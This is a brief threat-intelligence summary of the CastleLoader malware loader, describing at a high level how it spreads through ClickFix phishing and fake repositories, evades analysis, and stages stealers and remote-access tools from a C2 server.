CastleLoader is a newly identified versatile malware loader linked to campaigns distributing various information stealers and RATs. It utilizes ClickFix phishing attacks and fake repositories to deceive users. Observed earlier this year, CastleLoader has been associated with several malware types, including DeerStealer and RedLine. It employs advanced techniques like dead code injection to evade detection. Its modular architecture separates the infection process from payload execution, making it challenging for cybersecurity investigators to attribute attacks. Distribution tactics include using false domains and prompting user interactions that lead to malware activation.
CastleLoader employs dead code injection and packing techniques to hinder analysis. After unpacking itself at runtime, it connects to a C2 server, downloads target modules, and executes them.
CastleLoader's modular structure allows it to act as both a delivery mechanism and a staging utility, complicating attribution and response by separating the initial infection from payload deployment.
Payloads are distributed as portable executables with embedded shellcode that connects to the C2 server to fetch and execute next-stage malware.
Attacks leveraging CastleLoader use ClickFix phishing techniques on domains posing as software libraries and other familiar services, tricking users into executing malicious commands.
Collection
[
|
...
]